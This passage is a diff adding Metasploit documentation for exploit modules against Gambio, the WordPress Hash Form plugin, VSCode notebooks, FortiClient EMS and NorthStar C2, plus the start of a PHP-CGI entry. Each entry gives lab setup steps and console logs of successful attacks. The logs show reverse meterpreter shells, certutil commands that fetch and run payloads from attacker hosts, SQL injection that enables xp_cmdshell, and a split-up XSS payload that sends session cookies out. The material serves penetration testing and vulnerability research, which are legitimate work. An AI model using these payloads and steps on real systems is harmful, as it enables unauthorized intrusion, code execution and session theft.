+Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),29(audio)
+exit
+```
+
+### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
+```msf
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 2
+target => 2
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.25:80 can be exploited.
+[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/ODk0gcrj
+[*] Client 192.168.201.25 (Wget/1.21.2) requested /ODk0gcrj
+[*] Sending payload to 192.168.201.25 (Wget/1.21.2)
+[*] Sending stage (3045380 bytes) to 192.168.201.25
+[+] Deleted gJlhCqCPLrR.php
+[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:46426) at 2024-03-24 09:18:23 +0000
+[*] Command Stager progress - 100.00% done (114/114 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.25
+OS           : Ubuntu 22.04 (Linux 5.15.0-101-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > pwd
+/var/www
+meterpreter > exit
+```
+
+## Limitations
+Gambio is also supported on Windows systems, however the admin access seems to be broken on the vulnerable versions.
+This causes the exploit not to run successfully.
+Another dependency is that one or more tax countries should be defined in the configuration of the application, otherwise
+guest users can not be created causing the exploit to fail. The default setup of the application has at least one tax country defined.

documentation/modules/exploit/multi/http/wp_hash_form_rce.md

@@ -0,0 +1,196 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in WordPress Hash Form
+plugin, versions prior to 1.1.1.
+The vulnerability is due to an unauthenticated file upload flaw in the plugin.
+To replicate a vulnerable environment for testing:
+
+1. Install WordPress.
+2. Download and install the Hash Form plugin, ensuring the version is below 1.1.1.
+3. Verify that the plugin is activated and accessible on the local network.
+4. Create any form
+
+## Verification Steps
+
+1. Set up a WordPress instance with the Hash Form plugin (version < 1.1.1).
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/wp_hash_form_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+No option
+
+## Scenarios
+
+### Successful Exploitation Against Local WordPress with Hash Form 1.10
+
+**Setup**:
+
+- Local WordPress instance with Hash Form version 1.1.0.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/wp_hash_form_rce
+```
+3. Set `RHOSTS` to the local IP (e.g., 192.168.1.11).
+4. Configure other necessary options (TARGETURI, SSL, etc.).
+5. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`
+
+```
+msf6 > search wp_hash_form_rce
+
+Matching Modules
+================
+
+   #  Name                                   Disclosure Date  Rank       Check  Description
+   -  ----                                   ---------------  ----       -----  -----------
+   0  exploit/multi/http/wp_hash_form_rce    2024-05-23       excellent  Yes    WordPress Hash Form Plugin RCE
+   1    \_ target: Automatic                 .                .          .      .
+   2    \_ target: PHP In-Memory             .                .          .      .
+   3    \_ target: Unix/Linux Command Shell  .                .          .      .
+   4    \_ target: Windows Command Shell     .                .          .      .
+
+
+Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_hash_form_rce
+After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'
+
+msf6 > use 0
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_hash_form_rce) > options
+
+Module options (exploit/multi/http/wp_hash_form_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_hash_form_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(multi/http/wp_hash_form_rce) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/wp_hash_form_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Detected Hash Form plugin version: 1.1.0
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce from the target...
+[+] Nonce retrieved: c037ee0b47
+[*] Uploading PHP payload using the retrieved nonce...
+[+] PHP payload uploaded successfully to http://localhost:8080/wp-content/uploads/hashform/temp/zumchnzt.php
+[*] Triggering the payload at http://localhost:8080/wp-content/uploads/hashform/temp/zumchnzt.php...
+[*] Sending stage (39927 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.20.0.3:52596) at 2024-05-28 17:52:51 +0200
+
+meterpreter > sysinfo 
+Computer    : 92b664be9b0c
+OS          : Linux 92b664be9b0c 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/wp_hash_form_rce) > options
+
+Module options (exploit/multi/http/wp_hash_form_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      KtElgOyozC       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       5555             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Unix/Linux Command Shell
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_hash_form_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Detected Hash Form plugin version: 1.1.0
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce from the target...
+[+] Nonce retrieved: c037ee0b47
+[*] Uploading PHP payload using the retrieved nonce...
+[+] PHP payload uploaded successfully to http://localhost:8080/wp-content/uploads/hashform/temp/roeylnhj.php
+[*] Triggering the payload at http://localhost:8080/wp-content/uploads/hashform/temp/roeylnhj.php...
+[*] Sending stage (3045380 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.20.0.3:53478) at 2024-05-28 18:03:35 +0200
+
+meterpreter > sysinfo
+Computer     : 172.20.0.3
+OS           : Debian 12.5 (Linux 5.15.0-91-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+- The module attempts to retrieve a nonce from the local server.
+- It then uploads and executes the payload.
+- If successful, control over the local WordPress instance is gained, depending on the payload used.

documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md

@@ -0,0 +1,148 @@
+## Vulnerable Application
+
+VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.
+On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed
+HTML and javascript, which can then open new terminal windows within VSCode.
+Each of these new windows can then execute arbitrary code at startup.
+
+During testing, the first open of the Jupyter notebook resulted in pop-ups
+displaying errors of unable to find the payload exe file. The second attempt
+at opening the Jupyter notebook would result in successful execution.
+
+Successfully tested against VSCode 1.70.2 on Windows 10 and Ubuntu 22.04.
+
+### Install
+
+From https://code.visualstudio.com/updates/v1_70
+
+https://update.code.visualstudio.com/1.70.2/win32-x64-user/stable
+
+https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable
+
+
+## Verification Steps
+
+### Windows
+1. Install the application
+1. Start msfconsole
+1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
+1. Do: `set lhost [ip]`
+1. Do: `run`
+1. In VSCode, open the URL (File -> Open -> Paste/type the URL)
+1. After the pop-up errors, open the file again.
+1. You should get a shell.
+
+### Linux
+1. Install the application
+1. Start msfconsole
+1. Do: `use linux/x64/meterpreter/reverse_tcp`
+1. Do: `set lhost [ip]` and `set lport [port]`
+1. Do: `generate -o shell.sh -f elf`
+1. Copy the payload `shell.sh` to `/tmp/` on the target and run `chmod +x /tmp/shell.sh`
+1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
+1. Do: `set target 1 `
+1. Do: `set lhost [ip]` and `set lport [port]` - be sure to set these to the same values as in the previous step
+1. Do: `set FETCH_WRITABLE_DIR /tmp/`
+1. Do: `set PAYLOAD_FILENAME shell.sh`
+1. Do: `run`
+1. Copy the ipynb, and payload file to the target machine.
+1. In VSCode, open the file (File -> Open -> project.ipynb)
+1. After the pop-up errors, open the file again.
+1. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### VSCode 1.70.2 on Windows 10
+
+```
+resource (ipynb)> use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+resource (ipynb)> set fetch_srvport 9090
+fetch_srvport => 9090
+resource (ipynb)> rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.10.147:4444 
+[*] Starting up web service...
+[*] Using URL: http://192.168.10.147:8080/project.ipynb
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+
+
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sending stage (201798 bytes) to 192.168.10.100
+[*] Sending stage (201798 bytes) to 192.168.10.100
+[*] Meterpreter session 1 opened (192.168.10.147:4444 -> 192.168.10.100:56964) at 2024-03-21 12:38:13 +0000
+[*] Meterpreter session 2 opened (192.168.10.147:4444 -> 192.168.10.100:56967) at 2024-03-21 12:38:14 +0000
+^C[-] Exploit failed [user-interrupt]: Interrupt 
+[*] Server stopped.
+[-] rexploit: Interrupted
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-Q0HUOEI
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 4
+Meterpreter     : x64/windows
+meterpreter > shell
+Process 9632 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4170]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Users\h00die>code --version
+code --version
+1.70.2
+e4503b30fc78200f846c62cf8091b76ff5547662
+x64
+
+C:\Users\h00die>
+```
+
+### VSCode 1.70.2 on Linux
+
+```
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Starting up web service...
+[*] Using URL: http://172.16.199.1:8090/project.ipynb
+[*] Sent project.ipynb to 172.16.199.131
+[*] Sending stage (3045380 bytes) to 172.16.199.131
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:60298) at 2024-05-13 09:56:36 -0700
+
+^C[-] Exploit failed [user-interrupt]: Interrupt
+[*] Server stopped.
+[-] run: Interrupted
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information               Connection
+  --  ----  ----                   -----------               ----------
+  3         meterpreter x64/linux  msfuser @ 172.16.199.131  172.16.199.1:4444 -> 172.16.199.131:60298 (172.16.199
+
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: msfuser
+meterpreter > sysinfo
+Computer     : 172.16.199.131
+OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md

@@ -0,0 +1,145 @@
+## Vulnerable Application
+An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).
+FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized
+platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which
+can be sent directly into database queries.
+
+FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013
+and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.
+In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable
+SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code
+execution in the context of NT AUTHORITY\SYSTEM
+
+Affected versions of FortiClient EMS include:
+ 7.2.0 through 7.2.2
+ 7.0.1 through 7.0.10
+
+Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.
+
+It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient
+EMS for the necessary vulnerable services to be available.
+
+### Setup
+You'll need two Windows hosts. One domain controller and one Windows 10 host (a domain controller might not be 100%
+necessary however I used one and if you choose not to, your installation mileage may vary). The Windows 10 host will eventually
+install the FortiClient EMS Client and will be managed by our FortiClient EMS Server to enable the services required
+to exploit this vulnerability on the EMS Server. On the Windows 10 host set the the following Services to the following Startup Types:
+ - Task Scheduler: Automatic
+ - Windows Installer: Manual
+ - Remote Registry: Automatic
+
+Then either disable Windows Firewall completely or configure to allow the following inbound connections:
+ - File and Printer Sharing (SMB-In)
+ - Remote Scheduled Tasks Management (RPC)
+
+Now on the domain controller download the installer `FortiClientEndpointManagementServer_7.0.7.0398_x64.exe`. You will need
+a FortiNet account to request a free trial.
+
+On the domain controller launch the installer. When it completes within the application you will be presented with a sign in page.
+Enter username: "admin" with a blank password and click "Sign in" - this will prompt you to create a new password for the admin user.
+Then authenticate with the new password.
+A pop up window reading: "We didn't find any licenses for this EMS..." click "Try Free" and sign in with your FortiNet
+account to request a free trial.
+
+Once FortiClient EMS has been launched, in the left hand side select System Settings > EMS Settings, then under Shared
+Settings select "Use FQDN" and input the domain controller's FQDN. Ensure the FQDN is accessible by pinging it from the cmdline.
+A pop up window reading: "The server will need to restart..." click "Yes".
+
+Scroll down to "EMS Settings". In the "FortiClient Download URL" replace the IP address with the domain controller's FQDN.
+Click save.
+
+Next select System Settings > FortiGuard Services under Cloud Services set the timezone your server is located in.
+Click Save.
+
+Under "Deployment & Installers" > "FortiClient Installer" on the right hand side select "Add". A pop up window will appear.
+
+For "Installer Type" select "Choose an official release". For "Release", choose 7.0 and for "Patch" choose 7.0.7 , click next.
+For "Name" input "FCT_707" click next.
+Keep all the defaults for the Features section and click next.
+Keep all the defaults for the Advanced section and click next and then click Finish.
+
+Now you should have a Deployment Package with a Download Link. Navigate to that download link on your Windows 10 host
+and download and install the .msi package. Once installed correctly you should see the Windows 10 host appear under the
+"Endpoint" tab in the EMS Server. FortiClient EMS Server should now be exploitable.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use windows/http/forticlient_ems_fctid_sqli`
+1. Set the `RHOST` and `LHOST` options
+1. Run the module
+1. Receive a Meterpreter session running in the context of `NT AUTHORITY\SYSTEM`
+
+## Scenarios
+### FortiClient EMS 7.07.0398_x64 running on Windows Server 2019 (Domain Controller)
+```
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > options
+
+Module options (exploit/windows/http/forticlient_ems_fctid_sqli):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   8013             yes       The target port (TCP)
+   VHOST                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      FqgyHVSnYd       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               8383             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) >
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
+[*] Reloading module...
+
+[*] Started reverse TCP handler on 172.16.199.1:8383
+[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
+[+] 172.16.199.200:8013 - The target is vulnerable. The SQLi has been exploited successfully
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;-- was executed successfully
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;-- was executed successfully
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
+[*] Sending stage (201798 bytes) to 172.16.199.200
+[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; DECLARE @SQL VARCHAR(120) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75
+726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f7a524b42764743776d624662474c46336c4e6f486d772025
+54454d50255c6a744d45695362632e6578652026207374617274202f42202554454d50255c6a744d45695362632e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
+[*] Meterpreter session 8 opened (172.16.199.1:8383 -> 172.16.199.200:57847) at 2024-04-11 14:00:22 -0700
+
+meterpreter > getuid
+syServer username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC2
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : KERBEROS
+Logged On Users : 16
+Meterpreter     : x64/windows
+meterpreter >
+```

documentation/modules/exploit/windows/http/northstar_c2_xss_to_agent_rce.md

@@ -0,0 +1,163 @@
+## Vulnerable Application
+
+NorthStar C2, prior to commit `7674a44` on March 11 2024, contains a vulnerability where the logs page is
+vulnerable to a stored XSS.
+An unauthenticated user can simulate an agent registration to cause the XSS and take over a user's session.
+With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts
+(agents), and kill the original agent.
+
+Successfully tested against NorthStar C2 commit `e7fdce148b6a81516e8aa5e5e037acd082611f73` running on
+Ubuntu 22.04. The agent was running on Windows 10 19045.
+
+```mermaid
+flowchart TD
+    A(fa:fa-computer Metasploit)
+    B(fa:fa-server NorthStar C2)
+    C(fa:fa-person Northstar C2 User)
+    D(fa:fa-bug Agent)
+    A -->|1. Upload XSS| B
+    B -...-> C
+    C -->|2. Visit XSS Page| B
+    C -->|3. Send cookie| A
+    A -->|4. Using Cookie, takeover agents| B
+    D -->|5. Fetch and run payload, kill agent| A
+    D -...-> B
+    B -...-> D
+```
+
+### Install NorthStar C2
+
+Instructions for Ubuntu 22.04. Official documentation and manual installation steps can be found [here](https://github.com/EnginDemirbilek/NorthStarC2/wiki/Installation).
+
+```
+sudo apt-get update
+sudo apt-get install -y software-properties-common git wget mysql-server
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get update
+sudo service mysql start
+git clone https://github.com/EnginDemirbilek/NorthStarC2.git
+cd NorthStarC2
+git checkout e7fdce148b6a81516e8aa5e5e037acd082611f73
+chmod +x install.sh
+sudo ./install.sh # mysql answers: root:<empty>, make sure to give a website username/password
+sudo apt-get purge -y php
+sudo apt autoremove -y
+sudo apt-get install -y php7.2 libapache2-mod-php7.2 php7.2-mysql
+sudo a2dismod php*
+sudo a2enmod php7.2
+sudo service apache2 restart
+```
+
+### Agent Install
+
+This should be done on a Windows computer:
+
+On the c2 payload, you'll want to edit `Program.cs` on line 13 and edit `mainUri` to your northstar IP.
+Now run the program, or compile and run it, and ensure the agent is active on the NorthStar C2 website.
+
+## Verification Steps
+
+1. Install the application, and connect an agent
+1. Start msfconsole
+1. Do: `use exploit/windows/http/northstar_c2_xss_to_agent_rce`
+1. Do: `set rhosts [ip]`
+1. Do: `set srvhost [srvhost]`
+1. Do: `set fetch_srvport [fetch_srvport]`
+1. Do: `set fetch_srvhost [fetch_srvhost]`
+1. Do: `run`
+1. Do: visit the NorthStarC2 site with a logged in user, and browse to the Server Logs page.
+1. You should get a shell on each agent.
+
+## Options
+
+### KILL
+
+If the NorthStarC2 agent should be explicitly killed on each compromised host. Defaults to `false`
+
+## Scenarios
+
+### NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 on Ubuntu 22.04 with an agent on Windows 10
+
+```
+resource (northstar.rq)> use exploit/windows/http/northstar_c2_xss_to_agent_rce
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+resource (northstar.rq)> set rhosts 4.4.4.4
+rhosts => 4.4.4.4
+resource (northstar.rq)> set srvhost 3.3.3.3
+srvhost => 3.3.3.3
+resource (northstar.rq)> set verbose true
+verbose => true
+resource (northstar.rq)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (northstar.rq)> set FETCH_srvhost 3.3.3.3
+FETCH_srvhost => 3.3.3.3
+msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > exploit
+[*] Command to run on remote host: certutil -urlcache -f http://3.3.3.3:9090/p3icRkNmQwbsIs7RYzV5sA %TEMP%\tKvCAnUBZgfn.exe & start /B %TEMP%\tKvCAnUBZgfn.exe
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) >
+[*] Fetch handler listening on 3.3.3.3:9090
+[*] HTTP server started
+[*] Adding resource /p3icRkNmQwbsIs7RYzV5sA
+[*] Started reverse TCP handler on 3.3.3.3:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. NorthStar Login page detected
+[*] Sending XSS
+[*] Sending: N*/</script><q
+[*] Sending: N*/i.src=u/*q
+[*] Sending: N*/new Image;/*q
+[*] Sending: N*/var i=/*q
+[*] Sending: N*/s+h+p+'/'+c;/*q
+[*] Sending: N*/var u=/*q
+[*] Sending: N*/'http://';/*q
+[*] Sending: N*/var s=/*q
+[*] Sending: N*/':8080';/*q
+[*] Sending: N*/var p=/*q
+[*] Sending: N*/a+b;/*q
+[*] Sending: N*/var h=/*q
+[*] Sending: N*/'.10.147';/*q
+[*] Sending: N*/var b=/*q
+[*] Sending: N*/'192.168';/*q
+[*] Sending: N*/var a=/*q
+[*] Sending: N*/d.cookie;/*q
+[*] Sending: N*/var c=/*q
+[*] Sending: N*/document;/*q
+[*] Sending: N*/var d=/*q
+[*] Sending: N</td><script>/*q
+[*] Waiting on XSS execution
+[*] Using URL: http://3.3.3.3:8080/
+[*] Server started.
+```
+
+Now visit the site with a logged in user, and browse to the Server Logs page.
+
+```
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce - Received GET request.
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce - Received cookie: st0sfhqto9mqtpd81rlg6hq5g5
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce - Live Agents
+===========
+ ID                   IP              OS                      Username                Hostname         Status
+ --                   --              --                      --------                --------         ------
+ NC1S7X834eJVcJtynrq  222.222.22.222  Windows 10 Enterprise   DESKTOP-Q0HUOEI\h00die  DESKTOP-Q0HUOEI  Online
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce - CSRF Token: 38b4d324e8cd233b7a94c62e7b3c5556
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Stealing DESKTOP-Q0HUOEI
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce -   (NC1S7X834eJVcJtynrq) Enabling shell mode
+[+] 1.1.1.1    northstar_c2_xss_to_agent_rce -     Command sent successfully to agent NC1S7X834eJVcJtynrq, response: Cmd mode enabled, all commands will be redirect to CMD. Response delay is : 2000 miliseconds
+[*] 1.1.1.1    northstar_c2_xss_to_agent_rce -   (NC1S7X834eJVcJtynrq) Running payload
+[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA
+[*] Sending payload to 222.222.22.222 (Microsoft-CryptoAPI/10.0)
+[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA
+[*] Sending payload to 222.222.22.222 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 222.222.22.222
+[*] Meterpreter session 1 opened (3.3.3.3:4444 -> 222.222.22.222:50116) at 2024-04-10 14:40:31 +0000
+msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > sessions -i 1
+[*] Starting interaction with 1...
+meterpreter > sysinfo
+Computer        : DESKTOP-Q0HUOEI
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/window
+```

documentation/modules/exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.md

@@ -0,0 +1,200 @@
+## Vulnerable Application
+This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations
+on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that
+the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)
+character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose
+the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),
+and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.
+
+XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target
+an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.
+
+## Testing
+* Configure a Windows system with a system locale for Japanese (code page 932).
+  * Navigate to `Control Panel` -> `Region` -> `Administrative` -> `Change system locale...`
+  * Select `Japanese (Japan)` and click `OK`.
+  * Click `Restart now`.
+  * After restart, login and open a command prompt. Verify the code page via the command `chcp`. You should see this:
+```
+Microsoft Windows [Version 10.0.20348.1607]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Users\Administrator>chcp
+Active code page: 932
+```
+* Download a known vulnerable version of XAMPP `8.2.12 / PHP 8.2.12`
+([direct link here](https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe)).
+* Install XAMPP and run the XAMPP Console. Click the `Start` action to start the Apache web server.
+* Verify you can browse to http://127.0.0.1:80/. You should see the "Welcome to XAMPP for Windows" page.
+
+No further configuration is needed to exploit the target when targeting the exploits default `TARGETURI` endpoint
+`/php-cgi/php-cgi.exe'`. This is because XAMPP uses the Apache `ScriptAlias` directive to expose the `php-cgi.exe`
+binary directly. If you want to target an `.php` endpoint (for example `/index.php`), the target Apache serer must
+have this enabled in its configuration (`c:\xampp\apache\conf\extra\httpd-xampp.conf`):
